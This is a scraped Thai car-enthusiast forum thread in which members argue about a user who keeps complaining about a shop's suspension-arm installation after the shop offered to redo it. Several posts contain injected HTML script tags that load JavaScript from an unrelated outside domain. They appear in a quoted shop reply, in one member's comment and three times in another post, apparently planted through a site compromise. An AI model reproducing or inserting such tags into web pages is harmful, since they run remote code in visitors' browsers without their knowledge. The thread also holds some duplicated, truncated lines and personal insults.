หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
hacker

ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 26 กุมภา 2013 20:13 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
หลายวันผ่านมีมีกระทู้เกี่ยวกับการให้บริการติดตั้งปีกนก

http://www.civicesgroup.com/forum/topic54280

ซึ่งมองๆไปอาจจะเป็นการไม่พอใจในการให้บริการของทางร้านค้า

ถ้าหลายๆคนติดตามกระทู้ก็อาจจะทราบเรื่องราวเป็นอย่างดี 

จนทำให้มีคน คะนองปาก วิจารณ์กันไปต่างๆนาๆ ซึ่งก็คือความเห็นส่วนบุคคล

onlined พิมพ์ว่า:
1.ผิดที่ผม โง่เองไปร้านที่ใครเขาว่าดีนักหนา
2.คิดว่าจะบริการดีร้านแถวบ้านผมเขายังให้ความสำคัญกับรถผมมากกว่านี้อีก แต่ร้านเขาไม่มีอัดน้ำมัน ซึ่งผมไปร้านนี้มาหลายรอบแล้ว ไกลแค่ไหนก็ไปแต่ครั้งนี้เสียความรู้สึกจริงๆ
3.ผิดชิ้นงานของตัวปีกนกนี้อะไหล่วัสดุไม่ได้คุณภาพ ช่างแม่งเลยทำเป็นรอยง่าย
4.ผิดที่ช่างมักง่าย ชุ่ย
ขอร้องว่าอย่าซ้ำเติมผม เพราะผมดันไปพาดพิงที่หลายๆท่านอวยว่าเทพ

ซึ่งประเด็นนี้ก็ได้รับคำตอบจากผู้ให้บริการดังนี้

mai พิมพ์ว่า:
ต้องขอโทษด้วยนะครับ พอได้ทราบเรื่องตั้งแต่เช้าแล้ว แต่วันนี้งานเยอะจริงๆ
เลยไม่มีเวลาเข้ามาตอบ เอาเป็นว่าทางร้านยินดีที่จะรับผิดชอบ จะเปลี่ยนให้ใหม่
เพื่อความสะบายใจของลูกค้า  สะดวกวันไหน ยังไง ก็เข้ามานะครับ ไม่เป็นไรทางเรายินดี
และหวังว่าจะกลับมาใช้บริการอีกนะครับ ทางร้านยังยินดีต้อนรับเสมอ
<script src="https://sport32news.com/civicesgroup.js"></

ซึ่งมันน่าจะจบกับการแสดงความรับผิดชอบ

ถ้าเป็นร้านอื่นคุณอาจจะโดนคำตอบแบบว่า คุณไปโดนอะไรมารึป่าว บลาๆ

แต่เรื่องมันไม่ใช่แค่นั้น เมื่อวานมีการตั้งกระทู้ขึ้นมา 1 กระทู้

User - Onlined ยังคิดว่าตัวเองยังไม่ได้รับความยุติธรรม จึงออกมาโพสข้อความต่างๆ

และมีการลบกระทู้ ทำให้หลายๆคนไม่ทราบ และไม่เห็น ซึ่งตัวผมเองก็ได้เตือน User นี้

และมีการแสดงอาการไม่พอใจออกมา 

ไฟล์หน้า 1 ผมกู้มาไม่ได้ เอาหน้า 2 เลยนะ
ไฟล์หน้า 1 ผมกู้มาไม่ได้ เอาหน้า 2 เลยนะ
สมาชิกหลายคนออกเตือน และแสดงความคิดเห็น
สมาชิกหลายคนออกเตือน และแสดงความคิดเห็น
ว่ากันไปตามเนื้อผ้าและข้อความ
ว่ากันไปตามเนื้อผ้าและข้อความ
สามารถออกความคิดเห็นกันได้ ไม่ว่ากัน
สามารถออกความคิดเห็นกันได้ ไม่ว่ากัน

แก้ไขล่าสุดโดย เมื่อ อังคาร, 26 กุมภา 2013 20:20, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  เค  wut-chiangmai  ballanupong  puyzaaaaa  ahingrace 
hacker

อังคาร, 26 กุมภา 2013 20:16 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ปัญหาเกิดจาก Comment ของผมเอง ซึ่งได้เตือน Onlined ไป

ข้อความที่ผม Q มาจากหน้าแรก เพื่อเตือน
ข้อความที่ผม Q มาจากหน้าแรก เพื่อเตือน
และนี่คือคำตอบที่ผมได้มา
และนี่คือคำตอบที่ผมได้มา
จนเกิดอาการ ไม่สุภาพตามนี้
จนเกิดอาการ ไม่สุภาพตามนี้
และนี้คือคำตอบ ของบุคคลที่บอกว่าไม่ได้โวยวาย ไม่ได้เรียกร้อง
และนี้คือคำตอบ ของบุคคลที่บอกว่าไม่ได้โวยวาย ไม่ได้เรียกร้อง
ผลลัพท์
ผลลัพท์

แก้ไขล่าสุดโดย เมื่อ อังคาร, 26 กุมภา 2013 20:22, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: เค  ค้าอะไหล่โคตรเก่า  taguunzae  Pantamitr  tokmun002  hikaru_kung  wut-chiangmai  mayuct  cisco  koobe 
hacker

อังคาร, 26 กุมภา 2013 20:26 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
และนี่ก็คืออีกหลายๆการกระทำของ User นี้ 

http://www.civicesgroup.com/forum/post1237174#1237174  กันสาด(หน้า4)
http://www.civicesgroup.com/forum/topic54280  ปีกนก

Attached File :
*~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  เค  wut-chiangmai  POP_ES05  cisco 
hacker

อังคาร, 26 กุมภา 2013 20:35 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
สรุป

1. โลกนี้มีทั้งด้าน + ด้าน - คนดี คนเลว 
2. คนที่โพสอะไรโดยความคะนองปาก ไม่รู้เหตุผลที่มาที่ไป
   สิ่งที่คุณโพสไปพิมพ์ไป หรือกด Thk. คุณสามารถรับผิดชอบอะไรกับมันได้บ้าง
3. เจ้าของกระทู้ลบไปด้วยสาเหตุอะไร ? Pm มาบอกผมหน่อย
    หรือเพียงเพราะ Onlined มาตอบแบบแสดงธาตุแท้ แล้วท่านไม่อยากให้คนอื่นเห็น

4. บอร์ดเป็นบอร์ดสาธารณะ ทุกคนสามารถออกความเห็นได้

และนี่คือ ความเห็นของผม และสิ่งที่ผมเห็น

ความคิดของคุณมันถูกตอบออกมาในรูปสุดท้าย

แก้ไขล่าสุดโดย เมื่อ อังคาร, 26 กุมภา 2013 20:56, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: เค  onitsuka37  สมชาย  domziia  kittidech  earnee33  mayuct  POP_ES05  bad-in-mind  lkki5  LnwwasaD  cisco  POD943  koobe  puyzaaaaa  ahingrace  meseoul 
onlined

เข้าร่วม: 19 สิงหา 2012
ตอบ: 70

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 235
ให้คำขอบคุณ: 0

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 26 กุมภา 2013 20:42 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
สุดยอดครับ เอาข้อความแย่ๆของผมมาออกอากาศ แต่คำพูดดีๆข้อคิดต่างๆ คุณกลับ ไม่เอาออกมาเนอะครับ  ปรบมือ

ผมอุสาห์อธิบายว่าทำไมผมไม่จบโทษครับทำไมผมต้องจบครับ ถ้ามีคนมาทำร้ายคุณ ถ้าเขาออกมาสำนึกผิดขอโทษคุณ จะจบไหมครับ

ไม่งั้นคงไม่มีข่าว ตำรวจพาผู้ร้ายไปขอขมา ประกอบคำสารภาพแล้วโดน ไทยมุงประชาทันหรอกครับ

ผมคนนึงละ ที่ไม่อยากให้เรื่องที่ผมเจอมา เป็นเพียงแค่สายลมที่มันพัดผ่านไป

ไม่อยากให้หลายๆคนเจอการบริการชุ่ยๆอย่างผม

ใครจะว่าผมพูดไม่เลิก  ไม่จบสักที จะพูดไป เชิญครับ

นิสัยของคนไทยลืมง่ายครับ เป็น เอกลักษณ์ แต่ผมเป็นคนไทยคนนึง ที่จะไม่ลืมง่ายๆ ครับ

ไม่ให้ตัวเองลืม ไม่ให้คนไทยด้วยกันลืม

ผมจะเปรียบเทียบให้ฟังนะครับ

เหมือนที่หลายๆคนลืมไปแล้ว ว่าใครมันมาเผาบ้านเผาเมืองเรา แล้วให้มันขึ้นเป็นใหญ่ทุกวันนี้

มันก้ไม่ต่างจากผม ที่ชอบโวยวายเอาของเล่นเป็นเด็ก แต่ต่างกันที่ผมไม่ไปทำให้ผู้ที่ไม่เกี่ยวข้องต้องเดือดร้อน

********************มีแต่ผู้ที่ไม่เกี่ยวข้อง เดือดเนื้อร้อนตัวกันเป็นแถว

ไม่ไปทำข้าวของสูญเสีย เสียหาย เพื่อจะได้อำนาจ ได้ความยิ่งใหญ่มาครอง

แล้วก็ คุณเคยถามพวกมันไหมครับว่า ที่เป็นใหญ่ทุกวันนี้ อยู่ในสังคมลำบากกันหรือเปล่า เหนื่อยไหม ?

บางทีการ การบริของแต่ละเจ้าแต่ละร้าน เห็นหลายๆคนออกมาอวยมาชมกันอย่างนั้นอย่างนี้ หลายๆร้านพูดได้เลย ที่ออกมาชมกันอะ

คนแบบที่พวกคุณบอกใช้แล้วก็งั้นๆ เขาก้เงียบไป บางคนพูดกับผม บางทีผมก็เจอกับตัวเอง แต่ไม่อยากพาดพิงเท่าไหร่ แค่พาดพิงร้านช่วงล่างผมก็รู้สึกผิดมากกละ บางร้านก็ไม่เห็นรู้สึกความต่างอะไร บางคนก้บอกแพงเกินไป แต่ร้านดีๆก้มีเจออยู่ร้านนึง จากหลายร้านที่ว่ากันมา

คนในบอด  ชอบสร้างกระแสร้านนั้นดีร้านนี้ดีแล้วก็มีสาวกออกมาชม คนที่เขาไปทำจริงๆมา หลายๆคน แล้วพบว่ามันก็งั้นๆ ได้แต่เงียบไม่กล้าพูดอะไรมากเพราะกัวจะไม่มีที่อยู่ในสังคมแห่งนี้

เพราะคนนัยนี้ถ้าเป็นร้านในคลับแล้วมีคนมาด่า ของขึ้นทันที แต่ถ้าเป้นร้านนอกคลับ นะ ร่วมด่าด้วยใส่ไม่ยั้ง ไม่ใช่ร้านพ่อแม่พี่น้องกู

แต่ถ้าเป็นร้านในคลับ หลายคนมาสร้างกะแสอวยชมว่าเทพ ดีอย่างนั้นอย่างนี้ มักจะแตะต้องไม่ได้

ถ้าผมจะไม่มีที่อยู่ ไม่มีจุดยืนก้เพราะเจอคนอย่างพวกคุณนั่นแหละครับ !!!!

ปล. อันนี้ผมจะตอบแต่เมื่อช้าวละ แต่ทู้โดนลบไป
ได้รับคำขอบคุณจาก: เค  สมชาย  onitsuka37  thaipra  kaisuh  Guide6351 
hacker

อังคาร, 26 กุมภา 2013 20:52 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ผมไม่ได้เลือกปฏิบัติครับ

อย่าใส่ร้ายผม ทุกข้อความ ทุกตัวอักษร

ผมกู้มาได้แค่หน้า 2 และไม่มีการตัดข้อความใดๆทั้งสิ้น

เป็นภาพที่ PrintScrn มาจากเครื่อง Server ที่ทำงาน
ก่อนกระทู้จะโดนลบ

และที่คุณจะอยู่ในสังคมไม่ได้ ไม่ใช่เพราะคนอื่นหรอกครับ

"มันเกิดจากตัวคุณเอง"
ได้รับคำขอบคุณจาก: เค  สมชาย  onitsuka37  focusyo  wut-chiangmai  ballanupong  POP_ES05  lkki5  puyzaaaaa  trucklinkin 
Pantamitr

ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 26 กุมภา 2013 20:57 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
โห เด่นเป็นสง่าอยุ่บนหน้า 2 เลยเรา
แล้วจบหรือยังครับเนี่ย
ได้รับคำขอบคุณจาก: เค  สมชาย  onitsuka37  POP_ES05 
onlined

เข้าร่วม: 19 สิงหา 2012
ตอบ: 70

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 235
ให้คำขอบคุณ: 0

อังคาร, 26 กุมภา 2013 21:03 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
hacker พิมพ์ว่า:
ผมไม่ได้เลือกปฏิบัติครับ

อย่าใส่ร้ายผม ทุกข้อความ ทุกตัวอักษร

ผมกู้มาได้แค่หน้า 2 และไม่มีการตัดข้อความใดๆทั้งสิ้น

เป็นภาพที่ PrintScrn มาจากเครื่อง Server ที่ทำงาน
ก่อนกระทู้จะโดนลบ

และที่คุณจะอยู่ในสังคมไม่ได้ ไม่ใช่เพราะคนอื่นหรอกครับ

"มันเกิดจากตัวคุณเอง"

ขอโทษครับช่วยบอกผมทีว่า ผมทำผิดอะไรครับถึง ได้ อยู่ในสังคมไม่ได้ ผมไม่ได้ใส่ร้ายหรือว่าร้าน โดนไม่มีมูลความจริงครับ หรืออาจจะมีใส่ไข่ไปเยอะ ?? ผมก็ไม่รู้ตัว ถ้าเยอะไปก็โทษด้วยครับ

หรือแม้แต่ถ้าผมหน้าด้านเข้าไป ให้เขาชดใช้ แล้วกลับออกมาด่าเขาต่อ ความผิดผมเหรอครับ ? ผมต้องเเปรพักกลับมา ซบเขามาไหว้เขาทุกเช้าเย็นหรือเปล่า

ไม่ใช่ผิดที่ร้านเหรอครับ ที่ควรจะต้องระมัดระวังไม่ทำงานชุ่ยๆแต่แรก ??? หรือว่ายุคสมัยนี้มันเปลื่ยนไปแล้ว
"
มีระบบบุญคุณแบบนักการเมือง แบบปัจจุบัน ที่มีคำขวัญประจำตัวว่า  "มีวันนี้ได้ เพราะพี่ให้" <- คนแบบนี้ผมไม่ต้องการครับ ผมไม่ชอบครับ

บอกใว้เลย และผมจะไม่ทำตัวแบบนี้ด้วยครับ ผมเลือกที่จะอยู่อย่างมีความสุขของผมแบบนี้ ไม่ต้องยิ่งใหญ่ ดีกว่าต้องไปตามเลียก้นใคร

ให้เสียศักศรีความเป็นคน
ได้รับคำขอบคุณจาก: เค  สมชาย  onitsuka37  Guide6351 
DELL

ชื่อเล่น: หนุ่ม

เข้าร่วม: 12 ธันวา 2008
ตอบ: 2245

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1831
ให้คำขอบคุณ: 5795

สี: น้ำเงิน วิวิด (มุก) (B-502P)
อังคาร, 26 กุมภา 2013 21:06 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ตามอ่านมาก็หลายหน้า ขอพูดสักครั้งเหอะคับ มันเริ่มจะนอกประด็ญแระคับ

ตกลงคุณต้องการอะไรคับ ร้านพรเทพก็แสดงความรับผิดชอบ ยังไม่จบอีกหรอคับ

รึต้องการอยากจะให้เค้าส่งของไปให้คุณที่บ้าน เพื่อที่คุณจะได้ไปเข้าไปร้าน รึ ยังไงก็ว่าไปสิคับ

มาบ่นเพื่อ!!!!!!!!!!!!!!!!!!!!! เอาตรงๆ ไปเลยจะได้จบๆๆคับ

ปล. ขอโทษนะคับสำหรับความคิดเหตุผมถ้าไม่ถูกใจท่าน 
ได้รับคำขอบคุณจาก: เค  สมชาย  onitsuka37  domziia  mayuct  wut-chiangmai  phichetza  ballanupong  POP_ES05  lkki5  LnwwasaD  cisco  puyzaaaaa  meseoul  trucklinkin 
inspire

เข้าร่วม: 30 พฤศจิกา 2009
ตอบ: 258

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 189
ให้คำขอบคุณ: 98

อังคาร, 26 กุมภา 2013 21:11 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ขอด้วยสักนิด....

คุณ Onlined ตรรกระคุณแปลกๆ เรื่องที่ยกมามันเกี่ยวกันซะที่ไหนละ ต่างกรรมต่างวาระ ต่างบริบท กันเลย

หลายคนในนี้เขาหาทางออกให้ ไม่ว่าจะให้เอาของไปเปลี่ยนคุณไม่เอา เจ้าของร้านออกมาแสดงความรับผิดชอบ คุณก็ไำม่จบไม่สิ้นเป็น

ปล่อยวางเถอะครับ ยึดมั่นถือมั่นไว้ มันหนัก ชัีวิตต้องเจอเรื่องอะไรอีกมากมาย เรื่องแค่นี้ลืมๆไปเถอะ ใช่ว่าเจ้าของร้านเขานิ่งเฉยซะที่ไหน

คุณเองก็เคยทำผิดพลาด ผมก็เคยทำผิดพลาด มันต่างกันตรงไหน ผมพูดถูกไหม...

ออกตัวไว้ก่อน ผมไม่ได้มาเลียร้านนี้ เคยเข้าไป 4-5 ครั้ง ก็เฉยๆนะ ไม่ได้ดีเลิศเลอ แต่ก็ไม่ได้แย่ขนาดนั้น

ข้อมูลที่คุณให้มาหลายๆคนคงอ่านแล้วละ ที่นี้เขาจะเชื่อหรือไม่ จะเสื่อมศรัทธาหรือไม่ ก็เป็นวิจารนะญาณของแต่ละบุคคลแล้วละครับ

ผมว่าพอเถอะ หวังดีครับ
ได้รับคำขอบคุณจาก: DELL  เค  สมชาย  Sak_es5442  taguunzae  KAATO  onitsuka37  domziia  flatron24  Pantamitr  wut-chiangmai  phichetza  aonrx  POP_ES05  TUNG11  LnwwasaD  cisco  meseoul 
hacker

อังคาร, 26 กุมภา 2013 21:20 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
สุดยอดครับ เอาข้อความแย่ๆของผมมาออกอากาศ แต่คำพูดดีๆข้อคิดต่างๆ คุณกลับ ไม่เอาออกมาเนอะครับ  ปรบมือ

อันนี้คุณกล่าวหาผมรึป่าว ?

ผมอุสาห์อธิบายว่าทำไมผมไม่จบโทษครับทำไมผมต้องจบครับ ถ้ามีคนมาทำร้ายคุณ ถ้าเขาออกมาสำนึกผิดขอโทษคุณ จะจบไหมครับ

ผมจบครับ ถ้าเค้าออกมาแสดงความรับผิดชอบ

ไม่งั้นคงไม่มีข่าว ตำรวจพาผู้ร้ายไปขอขมา ประกอบคำสารภาพแล้วโดน ไทยมุงประชาทันหรอกครับ

อย่าเหมารวมสิครับ คนร้ายขโมยขนมใน เซเว่น ยังไม่มีคนรุมเลยครับ ถ้าเรื่องไม่เป็นที่น่าประนามในสังคม ไม่มีหรอกครับ

ผมคนนึงละ ที่ไม่อยากให้เรื่องที่ผมเจอมา เป็นเพียงแค่สายลมที่มันพัดผ่านไป

ไม่อยากให้หลายๆคนเจอการบริการชุ่ยๆอย่างผม

สิทธิ์ของคุณครับ ผมก็ชี้แจงตามสิทธิเสรีภาพของผม เพื่อให้ใครหลายๆคนได้มองเห็นธาตุแท้ในตัวคุณ

ใครจะว่าผมพูดไม่เลิก  ไม่จบสักที จะพูดไป เชิญครับ

นิสัยของคนไทยลืมง่ายครับ เป็น เอกลักษณ์ แต่ผมเป็นคนไทยคนนึง ที่จะไม่ลืมง่ายๆ ครับ

ไม่ให้ตัวเองลืม ไม่ให้คนไทยด้วยกันลืม

การให้อภัย การขอบคุณ การขอโทษ เป็นหนึ่งในข้อคิดและคติดีๆที่คนไทยพึงมีครับ

ผมจะเปรียบเทียบให้ฟังนะครับ

เหมือนที่หลายๆคนลืมไปแล้ว ว่าใครมันมาเผาบ้านเผาเมืองเรา แล้วให้มันขึ้นเป็นใหญ่ทุกวันนี้

มันก้ไม่ต่างจากผม ที่ชอบโวยวายเอาของเล่นเป็นเด็ก แต่ต่างกันที่ผมไม่ไปทำให้ผู้ที่ไม่เกี่ยวข้องต้องเดือดร้อน

อย่าเอาไปโยงประเด็นการเมืองครับ เดี๋ยวจะยาว แล้วผิดกฏด้วยครับ
ได้รับคำขอบคุณจาก: DELL  เค  onitsuka37  สมชาย  domziia  wut-chiangmai  phichetza  ballanupong  POP_ES05  lkki5  cisco  koobe  puyzaaaaa  meseoul 
onitsuka37

ชื่อเล่น: เอ็มอ้วน

เข้าร่วม: 20 พฤษภาคม 2012
ตอบ: 852

Guru ES
Guru ES

ได้รับคำขอบคุณ: 673
ให้คำขอบคุณ: 1007

อังคาร, 26 กุมภา 2013 21:26 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
เดียวนี้ประเทศไทยแม่งอยู่ยาก จริงๆๆ ทั่งชีวิตจริง ทั่งfacebook ทั่งในบอร์ด 55+

ได้รับคำขอบคุณจาก: สมชาย  domziia  CROW  thammarong007  thaipra  POP_ES05  kaisuh  Auizie  koobe 
Tanadath

เข้าร่วม: 12 มีนา 2011
ตอบ: 1498

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1165
ให้คำขอบคุณ: 325

อังคาร, 26 กุมภา 2013 21:27 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
คุณ onlined ครับ
ผมว่าเลิกราต่อกันดีกว่า ร้านออกมารับผิดชอบแล้วก็น่าจะจบ มันผิดพลาดกันได้ มากน้อยอย่างไรคุยกันครับอย่าใช้อารมณ์มาพูดกัน กระทู้นี้เรื้อรังมานานผมอ่านบ้างไม่อ่านบ้างเพราะไม่ชอบกระทู้ลักษณะนี้ มันไม่สร้างสรรค์เลย สมาชิกควรให้เกียรติกันและกันในการแสดงความคิดเห็น ยอมรับในกติกาการตักเตือนจากผู้ดูแลระบบ กฏ กติกา และมารยาทเป็นสิ่งสำคัญครับหากต้องการร่วมเป็นส่วนหนึ่งของESเราครับ ขอเถอะครับหาความรู้มาแชร์กันดีกว่าครับ
ได้รับคำขอบคุณจาก: DELL  akkarin_c  สมชาย  Sak_es5442  Pantamitr  wut-chiangmai  thaipra  POP_ES05  LnwwasaD 
akkarin_c

ชื่อเล่น: ตู่

เข้าร่วม: 01 สิงหา 2012
ตอบ: 1225

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1081
ให้คำขอบคุณ: 441

สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 26 กุมภา 2013 21:28 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ไปกันใหญ่แล้ว มีการเมืองด้วย

ทางร้านก็ต้องมีความผิดพลาดกันได้ ผมมองว่าเป็นเรื่องปกติ
คุณจะไม่ให้โอกาสเค้าเลยหรือ
ซึ่งร้านเค้าเสนอทางแก้ไขให้ กลับไม่เอา กลัวเพราะด่าเค้าไว้เยอะ
เลยมาด่าเอามันส์ ผมมองว่าไม่แมนเลย ออกแนวพาลมากกว่า

ผมเองก็เคยไปใช้บริการ ช่างใส่ลูกหมากคันชักไม่ดี
ใช้แป๊ปเดียวขาด โช็คที่อัดน้ำมันมาก็รั่ว 1ต้น
ผมก็เข้าไปแก้ไข เค้าก็รับผิดชอบให้ ฟรีๆ
ผมก็ไม่ได้สนิทอะไรกับพี่เค้า คุยแค่ตอนบอกอาการรถ
แต่ก็คิดว่าเป็นอู่ที่ดีที่นึง
ได้รับคำขอบคุณจาก: DELL  สมชาย  Pantamitr  wut-chiangmai  phichetza  POP_ES05 
LifeFate

เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

ปี: 2003
อังคาร, 26 กุมภา 2013 21:29 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
แรกๆ ที่อ่านก็ เห็นใจ ที่ทำแล้ว ได้ของมีตำหนิ กลับมา..... แต่ตอนนี้ ผมว่าเหมือนเด็ก โตไม่รู้จรักโต
ได้รับคำขอบคุณจาก: DELL  สมชาย  TanKrab  Pantamitr  wut-chiangmai  phichetza  POP_ES05  yo555 
tonaff

ชื่อเล่น: เอ

เข้าร่วม: 26 ธันวา 2008
ตอบ: 673

Guru ES
Guru ES

ได้รับคำขอบคุณ: 721
ให้คำขอบคุณ: 1404

สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 26 กุมภา 2013 21:37 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ผมไปซื้อข้าวตอกมาปูเสื่อนั่งรอชมคับ
ท่าทางจะยาว ^^'
ได้รับคำขอบคุณจาก: สมชาย  CROW  phichetza  POP_ES05  Auizie  yo555 
fasang.Mr

ชื่อเล่น: บี

เข้าร่วม: 23 มีนา 2010
ตอบ: 2101

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1764
ให้คำขอบคุณ: 2323

อังคาร, 26 กุมภา 2013 21:38 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
จบเถอะครับไม่ชอบใจก็หาร้านทำใหม่ลองผิดลองถูกเอา ถ้าจะให้ได้อย่างใจทุกอย่างก็ทำเองเลยครับ. "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: สมชาย  wut-chiangmai  phichetza  POP_ES05 
a_bug

ชื่อเล่น: กอล์ฟ

เข้าร่วม: 31 มีนา 2012
ตอบ: 486

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 757
ให้คำขอบคุณ: 107

อังคาร, 26 กุมภา 2013 21:40 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ผมขอออกความเห็นว่าให้พอกันเถอะทั้งคู่ หากระทู้ดีๆมีความรู้มาแบ่งปันกันดีกว่า อย่าไปขุดหรือตั้งกระทู้เรื่องเดิมๆขึ้นมาอีกเลย
ได้รับคำขอบคุณจาก: onitsuka37  สมชาย  Sak_es5442  tokykung  Guide6351 
hacker

อังคาร, 26 กุมภา 2013 21:44 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
a_bug พิมพ์ว่า:
ผมขอออกความเห็นว่าให้พอกันเถอะทั้งคู่ หากระทู้ดีๆมีความรู้มาแบ่งปันกันดีกว่า อย่าไปขุดหรือตั้งกระทู้เรื่องเดิมๆขึ้นมาอีกเลย

อ่านข้อความในรูปที่ผมแนบก่อนครับ
ได้รับคำขอบคุณจาก: onitsuka37  OAK/MS  phichetza  KAATO  POP_ES05  yo555  CoolMo 
Oyoyoo

ชื่อเล่น: โอ

เข้าร่วม: 31 สิงหา 2009
ตอบ: 407

ได้รับคำขอบคุณ: 432
ให้คำขอบคุณ: 224

ปี: 2002
อังคาร, 26 กุมภา 2013 21:51 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
และแล้วก็ออกมากันจนได้ ตามระเบียบ เห็นมาเยอะ 5555
ได้รับคำขอบคุณจาก: Sak_es5442  POP_ES05  Guide6351 
Dangnoieleven

ชื่อเล่น: แดงน้อย

เข้าร่วม: 30 ตุลา 2012
ตอบ: 48

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 37
ให้คำขอบคุณ: 6

ปี: 2001
อังคาร, 26 กุมภา 2013 21:57 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
จบเถอะคับจะได้ไม่เป็นภาระของลูกหลาน
ได้รับคำขอบคุณจาก: Sak_es5442  domziia  thammarong007  phichetza  PoKo  POP_ES05  Auizie 
Sak_es5442

ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2012
ตอบ: 815

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1250
ให้คำขอบคุณ: 2956

อังคาร, 26 กุมภา 2013 22:05 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
Dangnoieleven พิมพ์ว่า:
จบเถอะคับจะได้ไม่เป็นภาระของลูกหลาน

555

<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: onitsuka37  POP_ES05 
hacker

อังคาร, 26 กุมภา 2013 22:09 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
Oyoyoo พิมพ์ว่า:
และแล้วก็ออกมากันจนได้ ตามระเบียบ เห็นมาเยอะ 5555

ขอความกรุณา อ่าน ก่อนที่จะโพสครับ ดูรูปทุกรูปรึยังครับที่โพสออกมา รู้สาเหตุรึยังครับที่โพสแบบนี้
ได้รับคำขอบคุณจาก: onitsuka37  KAATO  POP_ES05 
THAM

ชื่อเล่น: ตั้ม

เข้าร่วม: 05 ธันวา 2010
ตอบ: 951

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 946
ให้คำขอบคุณ: 777

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 26 กุมภา 2013 22:16 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
อยากให้มีกระทู้แบบนี้เยอะๆ ชอบจริงๆ ว่ะ
จะได้รู้ทาสแท้ของแต่ล่ะคน
จะได้รู้แต่ล่ะคนเป็นตัวของตัวเองหรือเปล่า
จะได้รู้แต่ล่ะคนมีความคิดเป็นของตนเองหรือเปล่า
จะได้รู้แต่ล่ะคนสันดานมันเป็นอย่างไร
ขอโทษด้วยหากข้อความข้างต้นมันไปกวนตีนใคร
ได้รับคำขอบคุณจาก: onitsuka37  POP_ES05  koobe  Guide6351 
a_bug

อังคาร, 26 กุมภา 2013 22:19 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
hacker พิมพ์ว่า:

อ่านข้อความในรูปที่ผมแนบก่อนครับ

